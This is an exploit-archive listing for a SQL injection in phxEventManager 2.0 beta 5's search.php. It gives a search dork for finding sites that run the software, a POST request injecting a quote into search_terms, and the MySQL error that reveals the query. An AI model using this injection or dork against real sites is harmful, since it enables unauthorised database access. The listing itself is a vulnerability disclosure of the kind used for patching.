phxEventManager 2.0B 5 SQL Injection

2012.03.02
Credit: skysbsb
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intext: \"Powered by phxEventManager\"

# Exploit Title: phxEventManager 2.0 beta 5 search.php search_terms SQL Injection Vulnerability # Date: 01/03/2012 # Author: skysbsb # Software Link: http://sourceforge.net/projects/phxeventmanager/ # Version: Web Application # Tested on: Apache/*nix # Dork: intext: "Powered by phxEventManager" # Code : Exploited Link : URL: http://vulnsite.com/path_to_pem/search.php? POSTDATA: datasubmit=1&searchtype=events&s_event_names=on&s_event_descriptions=on&s_event_presenters=on&s_event_contacts=on&search_terms=' Result: MDB2 Error: syntax error, _doQuery: [Error message: Could not execute statement] [Last executed query: SELECT * FROM pem_entries as e, pem_dates as d WHERE e.id = d.entry_id AND () AND e.entry_status != 2 AND d.date_status != 2 AND (e.entry_visible_to_public = 1 AND d.date_visible_to_public = 1) AND (e.entry_status != 0 AND d.date_status != 0) AND d.when_begin >= DATE_SUB(CURDATE(),INTERVAL 1 YEAR) ] [Native code: 1064] [Native message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') AND e.entry_status != 2 AND d.date_status != 2 AND (e.entry_visible_to_public ' at line 1] #skysbsb mailto:skysbsb[atttt]gmail.com -- David Gomes Guimares

References:

http://sourceforge.net/projects/phxeventmanager/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top